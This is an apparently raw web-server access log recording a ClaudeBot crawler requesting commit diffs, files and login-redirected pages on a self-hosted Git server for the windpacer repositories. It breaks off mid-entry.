"https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fdotenv" [Client 216.73.216.188] [Length 24090] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument%2FMIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv" [Client 216.73.216.188] [Length 56042] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=split&whitespace=ignore-change" [Client 216.73.216.188] [Length 173137] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-7.conf" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 23740] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?style=split&whitespace=ignore-all" [Client 216.73.216.188] [Length 173130] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-4.conf" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FAbout.tsx" [Client 216.73.216.188] [Length 25925] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9780] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-7.conf" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10886] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FHero.tsx" [Client 216.73.216.188] [Length 25820] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fnormalizer" [Client 216.73.216.188] [Length 24099] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-4.conf" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fmail_contact.py" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2F.TemporaryDocument%2FDOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 22764] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Factivate.csh" [Client 216.73.216.188] [Length 24994] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fmail_contact.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2Fletsencrypt%2Frenewal" [Client 216.73.216.188] [Length 24905] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 15595] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fwebsockets" [Client 216.73.216.188] [Length 24102] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2FDockerfile" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Factivate.fish" [Client 216.73.216.188] [Length 26606] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FTestService%2Fobj%2FTestService.csproj.nuget.g.props" [Client 216.73.216.188] [Length 22262] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 23474] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 23433] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2Fassetpilot.ico" [Client 216.73.216.188] [Length 23893] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 36955] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 11121] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstart.sh" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11056] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11050] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 216.73.216.188] [Length 11943] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fwatchfiles" [Client 216.73.216.188] [Length 24083] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom4.png" [Client 216.73.216.188] [Length 22739] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom3.png" [Client 216.73.216.188] [Length 22733] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom1.png" [Client 216.73.216.188] [Length 22693] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom6.png" [Client 216.73.216.188] [Length 22701] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Fpip3" [Client 216.73.216.188] [Length 24121] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 22746] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2FActivate.ps1" [Client 216.73.216.188] [Length 34307] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Flib64" [Client 216.73.216.188] [Length 23651] 